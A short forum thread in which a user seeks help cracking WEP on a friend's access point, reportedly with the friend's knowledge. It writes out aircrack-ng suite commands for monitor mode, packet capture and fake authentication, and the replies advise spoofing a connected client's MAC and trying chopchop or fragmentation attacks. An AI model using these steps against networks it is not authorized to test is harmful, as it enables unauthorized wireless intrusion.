cracking problem

[vicky5]

Hello friends. I'm new to this forum but I already know some things.

I've tryed to hack my own wireless ap, with success (I was using WEP 64 and mac filtering). Now, I'm trying to "hack" my friends wireless ap (he knows about), but without success!
This is what i've made until now:


airmon-ng start rausb0 11 -> to start the adapter. I only get one error: invalid command, forceprismheader (i think), but monitor mode works. I've checked with iwconfig and everything was fine

airodump-ng -c 11 --bssid 00:14:##:##:##:## -w ap1 rausb0

But with this, after 1 hour, not a single data packet received.

So, I thought no one was online. I've tryed this:

aireplay-ng -1 0 -e %%% -a 00:14:##:##:##:## -h FF:FF:FF:FF:FF:FF rausb0 ( %%% -> ssid; ## -> AP mac; FF -> my mac)

Sending Authentication Request
Authentication successful
Sending Association Request
Association successful :-)

Everything OK here.

After that:

aireplay-ng -5 -b 00:14:##:##:##:## -h FF:FF:FF:FF:FF:FF rausb0

It starts capturing packets... and never stops! No data packets received after 1 hour!

I've trayed with aireplay-ng -4 and appens the same.

What can I do? With my own AP this works..

[sickness]

http://forum.aircrack-ng.org/index.p...e;topic=2732.0

I think they pretty much answered the questions.

[acez0]

And I don't think you wanna set the source mac address (-h...) as the broadcast address (i.e FF:FF:...), Coz the ap rarely receives anything from that address if not never. If there is one client connected set the source address as his if not try the chop chop attack if that doesnt work try the frag attack.
Hope this helps.

[Archangel-Amael]

Time to read the aircrack-ng documentation.